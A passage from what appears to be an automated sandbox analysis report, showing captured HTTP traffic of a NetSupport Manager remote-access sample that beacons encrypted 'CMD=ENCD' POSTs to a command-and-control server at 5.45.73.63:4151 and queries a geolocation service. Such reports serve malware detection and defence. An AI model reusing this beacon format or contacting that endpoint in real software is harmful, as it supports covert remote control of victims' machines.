\\xca4j\\x94_mb\\xfd\\xaf\\xa3\\xc6v\\x14N\\xc4\\xd9\\xa5\\xc96\\x8c\\x17\\x90\\xb3\\xf1\\x1b|\\xbb\\xb4\\x0f\\x1ae\\xe79\\x92\\xe4\\x1a\\xdb\\xbcO\\xd0D\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  1090. "port": 4151
  1091.  
  1092.  
  1093. "count": 1,
  1094. "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
  1095. "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
  1096. "user-agent": "NetSupport Manager/1.3",
  1097. "method": "POST",
  1098. "host": "5.45.73.63",
  1099. "version": "1.1",
  1100. "path": "http://5.45.73.63/fakeurl.htm",
  1101. "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 76\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
  1102. "port": 4151
  1103.  
  1104.  
  1105. "count": 1,
  1106. "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  1107. "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
  1108. "user-agent": "NetSupport Manager/1.3",
  1109. "method": "POST",
  1110. "host": "5.45.73.63",
  1111. "version": "1.1",
  1112. "path": "http://5.45.73.63/fakeurl.htm",
  1113. "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  1114. "port": 4151
  1115.  
  1116.  
  1117. "count": 1,
  1118. "body": "",
  1119. "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
  1120. "user-agent": "",
  1121. "method": "GET",
  1122. "host": "geo.netsupportsoftware.com",
  1123. "version": "1.1",
  1124. "path": "/location/loca.asp",
  1125. "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1126. "port": 80
  1127.  
  1128.  
  1129. "count": 42,
  1130. "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  1131. "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
  1132. "user-agent": "NetSupport Manager/1.3",
  1133. "method": "POST",
  1134. "host": "5.45.73.63",
  1135. "version": "1.1",
  1136. "path": "http://5.45.73.63/fakeurl.htm",
  1137. "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  1138. "port": 4151
  1139.  
  1140.  
  1141.  
  1142. * Network Communication - SMTP:
  1143.  
  1144. * Network Communication - Hosts:
  1145.  
  1146. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment